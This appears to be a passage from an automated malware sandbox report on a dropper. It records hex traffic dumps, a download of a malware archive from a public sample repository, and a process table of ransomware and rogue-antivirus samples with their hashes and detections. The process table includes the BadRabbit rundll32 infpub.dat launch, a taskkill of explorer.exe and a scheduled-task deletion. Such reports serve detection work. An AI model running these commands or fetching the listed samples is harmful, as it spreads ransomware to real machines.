                                                                                                                                                            2022-09-29 12:45:15 UTC26917INData Raw: 3f 95 26 bc 3c a1 39 4d 28 a4 d3 76 19 e3 62 b9 b5 d3 23 d2 70 d5 a8 56 02 f5 ca 40 23 ac a5 f7 ad 9a f7 5a 0b 9f 3b da cb 9e ac 78 fa 18 85 2f 63 e7 90 80 09 2b 2b f4 f9 e6 6e ae c7 fb d9 cc 09 7b 65 1e 6c 43 f4 a2 7c a3 bb 6a af a5 b2 eb 55 19 7d bc 8a 92 ce b9 61 c6 09 14 98 51 a5 b3 07 8b 80 5b aa 0f 14 f7 ef 71 9f d0 77 f4 d2 64 20 17 00 3a 04 9d 21 8e c9 61 e8 8b d7 3e 39 28 50 67 6b 04 ee d0 0d 36 dd 32 c3 99 0b 2e 0e 6d db 19 6c 05 aa eb a7 fc c5 ef 03 ca d8 b0 9a 1e 72 46 7e f7 cd e6 fa cb 84 a9 c3 7b cd a5 20 a4 8e ac 89 60 e6 06 f3 69 7d 45 0a ae 36 63 5c a6 5d 46 6d a3 ca ea 4a 67 d7 cd fe da f4 6a d6 9d c6 9b 2d c9 dc 9f 9a 3c dc 8b db 54 b4 a4 08 b2 99 4d b2 cb 2d 94 59 55 0a 15 2f 36 fd ac 79 88 e7 d2 d5 c0 01 34 57 e4 9d cd 8e c5 80 70 36
                                                                                                                                                            Data Ascii: ?&<9M(vb#pV@#Z;x/c++n{elC|jU}aQ[qwd :!a>9(Pgk62.mlrF~{ `i}E6c\]FmJgj-<TM-YU/6y4Wp6
                                                                                                                                                            2022-09-29 12:45:15 UTC26933INData Raw: 0a 1c 8a 55 d2 19 29 5c f5 58 03 e4 50 d9 8d fa 4e 1f c8 94 2e 34 04 1b 54 47 53 43 7d 14 67 2e 4d 1b dd 25 bf 30 0f 16 67 8b 10 77 59 c5 d3 c9 e7 d1 e5 59 ed 81 05 c6 67 bf 6d 98 e0 ce cb 73 ef 5a 67 4b 72 07 97 f0 e1 1e 3c bb 1b 36 d8 9d 16 9b 71 ed a0 66 99 d3 e6 ec ba d7 a5 38 d6 54 b3 fd b8 d6 a0 63 60 10 1e 19 67 9e b1 c4 48 a5 57 5c 80 dc 5c 59 f5 e1 5b af 2f 08 30 7e ea 3d b0 86 15 88 2b 8b 5b 94 3b 28 da cc 7d 51 20 63 5a f8 95 7c 5b a2 5f 53 5c 12 74 f6 5e e7 56 67 02 0a a7 37 cc e2 08 c9 7a 1d b2 31 84 31 f4 a8 7d 18 59 af bc de ef 4a 1d 10 73 0e a5 6f 89 07 ca 2c 9d b6 23 b5 76 28 be 1a c1 92 28 59 72 14 17 d6 fc 9b 75 b6 fa a2 2c 9d 4b be 3c 6c 00 ee 38 e0 9c 22 4e 11 82 78 8a b6 c6 68 53 27 9c 57 8c b7 af 50 f9 80 a8 73 64 fe 0d 8d fd bf d8
                                                                                                                                                            Data Ascii: U)\XPN.4TGSC}g.M%0gwYYgmsZgKr<6qf8Tc`gHW\\Y[/0~=+[;(}Q cZ|[_S\t^Vg7z11}YJso,#v((Yru,K<l8"NxhS'WPsd
                                                                                                                                                            2022-09-29 12:45:15 UTC26949INData Raw: 34 1e e8 af 75 5b 5b 00 ee b8 1e 0d 7e 1c 11 9e 78 96 ac 10 6d ff f4 d9 2e 16 50 4a 17 81 52 89 a0 ff 1e 67 7c d1 f0 11 8a ee f2 98 4f 64 78 df 75 fe b0 24 40 b0 0c 5f 90 28 3e dc f0 e0 67 b1 a5 bb 57 54 94 04 38 d8 b6 9d 9d fe ab 21 c0 35 cc 5e 69 a3 c5 75 0a 15 dc f2 6a 69 86 df 6e 55 88 86 74 03 dc 50 80 15 05 71 0b 41 9f 21 a0 77 cd 0c a8 28 04 26 65 5c e9 fd c5 47 12 cd b0 dd bd da a5 1d a5 43 fa 3e 05 92 35 94 da df f7 e6 72 0f 95 6b 30 a4 de bb 1c c3 8a 39 9e 9e e5 b0 45 c1 ea de d9 82 bf fe 5c 2e 47 09 3c 90 2a be ea e5 c8 57 cb 8e 95 c9 78 de e6 95 90 95 b8 e0 2b 2a 74 53 1b f8 37 8c f6 33 0d bd 1e bd 5d 74 7d 00 15 9b be c5 5f aa 4e 04 f0 07 d1 16 a9 64 6a 93 ca 24 e8 d3 6d 2f fe 6f 7b 11 4a ee e4 47 fc c5 6c 01 f0 f3 6f a5 17 a1 76 51 c8 83 84
                                                                                                                                                            Data Ascii: 4u[[~xm.PJRg|Odxu$@_(>gWT8!5^iujinUtPqA!w(&e\GC>5rk09E\.G<*Wx+*tS73]t}_Ndj$m/o{JGlovQ


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            98192.168.2.649757140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:18 UTC26952OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            99140.82.121.4443192.168.2.649757C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:18 UTC26952INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:01 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:18 UTC26953INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:14:44:35
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\bpkAAJptGv.exe"
                                                                                                                                                            Imagebase:0x291c3610000
                                                                                                                                                            File size:152064 bytes
                                                                                                                                                            MD5 hash:D197FAD90535FB974DB139537A091A5B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Reputation:low

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:14:44:50
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                            Imagebase:0x7ff603c50000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:14:44:51
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                            Imagebase:0x7ff603c50000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:14:44:54
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                            Imagebase:0x7ff603c50000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:14:44:55
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                            Imagebase:0x7ff603c50000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:14:44:55
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                            Imagebase:0x7ff603c50000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:14:44:56
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                            Imagebase:0x7ff660d30000
                                                                                                                                                            File size:163336 bytes
                                                                                                                                                            MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:14:44:56
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                                                                                            Imagebase:0x7ff603c50000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:14:44:57
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                            Imagebase:0x7ff603c50000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:14:44:57
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                                                                            Imagebase:0x7ff603c50000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:10
                                                                                                                                                            Start time:14:45:34
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\bpkAAJptGv.exe"
                                                                                                                                                            Imagebase:0x20836fa0000
                                                                                                                                                            File size:152064 bytes
                                                                                                                                                            MD5 hash:D197FAD90535FB974DB139537A091A5B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            Target ID:11
                                                                                                                                                            Start time:14:45:34
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@Antivirus.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@Antivirus.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:2066944 bytes
                                                                                                                                                            MD5 hash:C7E9746B1B039B8BD1106BCA3038C38F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 86%, ReversingLabs
                                                                                                                                                            • Detection: 60%, Metadefender, Browse

                                                                                                                                                            Target ID:12
                                                                                                                                                            Start time:14:45:37
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:757637 bytes
                                                                                                                                                            MD5 hash:382430DD7EAE8945921B7FEAB37ED36B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 78%, ReversingLabs
                                                                                                                                                            • Detection: 28%, Metadefender, Browse

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:14:45:37
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:835669 bytes
                                                                                                                                                            MD5 hash:7DFBFBA1E4E64A946CB096BFC937FBAD
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                                            • Detection: 64%, Metadefender, Browse

                                                                                                                                                            Target ID:14
                                                                                                                                                            Start time:14:45:40
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@AnViPC2009.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:1227610 bytes
                                                                                                                                                            MD5 hash:910DD666C83EFD3496F21F9F211CDC1F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 68%, ReversingLabs
                                                                                                                                                            • Detection: 24%, Metadefender, Browse

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:14:45:40
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\302746537.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\WINDOWS\302746537.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:22528 bytes
                                                                                                                                                            MD5 hash:8703FF2E53C6FD3BC91294EF9204BACA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 42%, ReversingLabs
                                                                                                                                                            • Detection: 52%, Metadefender, Browse

                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:14:45:42
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@BadRabbit.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@BadRabbit.exe"
                                                                                                                                                            Imagebase:0x1100000
                                                                                                                                                            File size:441899 bytes
                                                                                                                                                            MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 93%, ReversingLabs
                                                                                                                                                            • Detection: 83%, Metadefender, Browse

                                                                                                                                                            Target ID:17
                                                                                                                                                            Start time:14:45:44
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@Birele.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@Birele.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:119296 bytes
                                                                                                                                                            MD5 hash:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 86%, ReversingLabs
                                                                                                                                                            • Detection: 78%, Metadefender, Browse

                                                                                                                                                            Target ID:18
                                                                                                                                                            Start time:14:45:44
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:19
                                                                                                                                                            Start time:14:45:44
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\341C.tmp\302746537.bat" "
                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:20
                                                                                                                                                            Start time:14:45:44
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                                                                            Imagebase:0x12f0000
                                                                                                                                                            File size:61952 bytes
                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 00000014.00000003.431911084.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, Author: Christiaan Beek

                                                                                                                                                            Target ID:21
                                                                                                                                                            Start time:14:45:44
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:22
                                                                                                                                                            Start time:14:45:46
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:regsvr32 /s c:\windows\comctl32.ocx
                                                                                                                                                            Imagebase:0xd00000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:23
                                                                                                                                                            Start time:14:45:46
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@Cerber5.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@Cerber5.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:320760 bytes
                                                                                                                                                            MD5 hash:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: cerber3, Description: Cerber3 , Source: 00000017.00000000.422069094.0000000000448000.00000020.00000001.01000000.00000014.sdmp, Author: pekeinfo
                                                                                                                                                            • Rule: cerber3, Description: Cerber3 , Source: 00000017.00000000.415804257.0000000000448000.00000020.00000001.01000000.00000014.sdmp, Author: pekeinfo
                                                                                                                                                            • Rule: cerber3, Description: Cerber3 , Source: 00000017.00000000.420463459.0000000000448000.00000020.00000001.01000000.00000014.sdmp, Author: pekeinfo
                                                                                                                                                            • Rule: cerber3, Description: Cerber3 , Source: 00000017.00000000.406263679.0000000000448000.00000020.00000001.01000000.00000014.sdmp, Author: pekeinfo
                                                                                                                                                            • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 91%, ReversingLabs
                                                                                                                                                            • Detection: 76%, Metadefender, Browse

                                                                                                                                                            Target ID:24
                                                                                                                                                            Start time:14:45:47
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:taskkill /F /IM explorer.exe
                                                                                                                                                            Imagebase:0x13a0000
                                                                                                                                                            File size:74752 bytes
                                                                                                                                                            MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:25
                                                                                                                                                            Start time:14:45:48
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:26
                                                                                                                                                            Start time:14:45:54
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Target ID:27
                                                                                                                                                            Start time:14:45:55
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Endermanch@DeriaLock.exe"
                                                                                                                                                            Imagebase:0xa20000
                                                                                                                                                            File size:495616 bytes
                                                                                                                                                            MD5 hash:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: 0000001B.00000000.424660470.0000000000A66000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                                            • Detection: 69%, Metadefender, Browse

                                                                                                                                                            Target ID:28
                                                                                                                                                            Start time:14:45:55
                                                                                                                                                            Start date:29/09/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
